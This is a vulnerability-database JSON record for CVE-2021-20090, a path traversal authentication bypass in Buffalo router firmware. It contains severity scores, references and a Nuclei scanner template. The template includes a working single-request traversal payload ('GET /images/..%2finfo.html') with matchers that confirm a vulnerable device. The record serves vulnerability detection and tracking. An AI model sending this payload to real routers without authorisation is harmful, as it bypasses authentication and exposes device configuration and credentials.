{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2021-20090/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2021-20090/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2021-20090/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2021-20090/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2021-20090/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2021-20090"},"sightings":{"href":"/api/v1/sightings/cve-2021-20090"}},"enrichments":{"cisa-kev":{"kev":true},"epss":{"epss":0.99983,"kev":true,"percentile":0.99981},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2021/CVE-2021-20090.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2021-20090\n\ninfo:\n  name: Buffalo WSR-2533DHPL2 - Path Traversal\n  author: gy741\n  severity: critical\n  description: |\n    Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces.\n  impact: |\n    An attacker can exploit this vulnerability to read sensitive files, such as configuration files, credentials, or other sensitive information.\n  remediation: |\n    Apply the latest firmware update provided by Buffalo to fix the path traversal vulnerability.\n  reference:\n    - https://www.tenable.com/security/research/tra-2021-13\n    - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-20090\n    - https://www.kb.cert.org/vuls/id/914124\n    - https://www.secpod.com/blog/arcadyan-based-routers-and-modems-under-active-exploitation/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2021-20090\n    cwe-id: CWE-22\n    epss-score: 0.99983\n    epss-percentile: 0.99981\n    cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: buffalo\n    product: wsr-2533dhpl2-bk_firmware\n  tags: cve,cve2021,lfi,buffalo,firmware,iot,kev,tenable,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /images/..%2finfo.html HTTP/1.1\n        Host: {{Hostname}}\n        Referer: {{BaseURL}}/info.html\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - 'URLToken(cgi_path)'\n          - 'pppoe'\n          - 'wan'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 490a00463044022056eab0af848462cfe6fc652dd48f76a7adcad73ccdb5a2a415ccf252c27c271202202a22af44a7c985b0f0c4deeadda2ec24e85a27082053f063d6b671be0e3e206d:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2021-20090"}